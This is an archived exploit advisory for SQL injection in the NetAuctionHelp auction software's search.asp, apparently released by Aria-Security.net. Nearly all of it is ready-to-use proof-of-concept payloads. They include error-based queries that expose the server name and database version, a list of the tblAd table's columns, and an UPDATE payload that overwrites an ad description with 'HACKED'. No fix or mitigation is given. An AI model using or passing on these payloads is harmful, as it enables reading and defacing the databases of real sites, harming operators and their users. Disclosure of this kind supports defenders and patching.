AOH :: HP Unsorted N :: TB13532.HTM

NetAuctionHelp SQL Injection



Aria-Security.net: NetAuctionHelp SQL Injection
Aria-Security.net: NetAuctionHelp SQL Injection



Aria-Security Net=0D
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099=0D 
------------------------=0D
Vendor: http://www.netauctionhelp.com=0D 
=0D
PoC:=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION]=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--=0D
=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)--=0D
search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--=0D
=0D
=0D
=0D
tblAd.id=0D
tblAd.aspectratio=0D
tblAd.title=0D
tblAd.imagepath=0D
tblAd.startdate=0D
tblAd.enddate=0D
tblAd.id_seller=0D
tblAd.descr=0D
=0D
-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--=0D
=0D
this code with update itemdetl.asp?id=1=0D
=0D
=0D
Credit goes to Aria-Security.Net=0D
Greetz: AurA=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.